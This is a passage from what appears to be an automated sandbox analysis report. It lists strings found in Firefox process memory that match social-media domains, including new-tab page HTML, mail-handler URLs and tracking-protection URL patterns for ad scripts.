js/webtrends.min.jsWEBEXT_EVENTPAGE_IDLE_RESULT_COUNT equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B75A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php*sessionstore.resuming_after_os_restart equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B88F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B82F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Failed to listen. Listener already attached.No callback set for this channel.devtools.performance.popup.feature-flagFailed to listen. Callback argument missing.@mozilla.org/network/protocol;1?name=defaultbrowser.urlbar.dnsResolveFullyQualifiedNames@mozilla.org/network/protocol;1?name=filereleaseDistinctSystemPrincipalLoaderresource://devtools/server/devtools-server.js^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPdevtools.performance.recording.ui-base-urldevtools/client/framework/devtoolsDevToolsStartup.jsm:handleDebuggerFlagdevtools.debugger.remote-websocketdevtools/client/framework/devtools-browserDevTools telemetry entry point failed: WebChannel/this._originCheckCallback@mozilla.org/uriloader/handler-service;1^([a-z+.-]+:\/{0,3})*([^\/@]+@).+get FIXUP_FLAGS_MAKE_ALTERNATE_URIFailed to execute WebChannel callback:browser.fixup.dns_first_for_single_words^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?get FIXUP_FLAG_FORCE_ALTERNATE_URI@mozilla.org/dom/slow-script-debug;1Unable to start devtools server on {9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON dataresource://devtools/shared/security/socket.jsJSON Viewer's onSave failed in startPersistencebrowser.fixup.domainsuffixwhitelist.https://mail.yahoo.co.jp/compose/?To=%sgecko.handlerService.defaultHandlersVersionhttps://mail.inbox.lv/compose?to=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/DeferredTask.sys.mjs_injectDefaultProtocolHandlersIfNeededresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/FileUtils.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/JSONFile.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1resource://gre/modules/ExtHandlerService.sys.mjsextractScheme/fixupChangedProtocol<{33d75835-722f-42c0-89cc-44f328e56a86}http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/network/file-input-stream;1@mozilla.org/uriloader/dbus-handler-app;1Can't invoke URIFixup in the content processScheme should be either http or httpsisDownloadsImprovementsAlreadyMigratedSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULL@mozilla.org/network/simple-stream-listener;1newChannel requires a single object argument@mozilla.org/network/input-stream-pump;1https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/scriptableinputstream;1Non-zero amount of bytes must be specifiedhttps://mail.yandex.ru/compose?mailto=%shttps://mail.inbox.lv/compose?to=%spdfjs.previousHandler.preferredActionpdfjs.previousHan
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) || ((!os.isMac) && (version|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UpdateService:_postUpdateProcessing - removing downloading patch because we installed a different patch before it finisheddownloading.UpdateService:_postUpdateProcessing - status is pending-elevate, but this is a silent startup, so the elevation window has been suppressed.Downloader:onStopRequest - notifying observers of error. topic: update-error, status: download-attempts-exceeded, downloadAttempts: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/AND bookmarked equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2800920930.000002BA56B76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 00000018.00000002.2800920930.000002BA56B76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
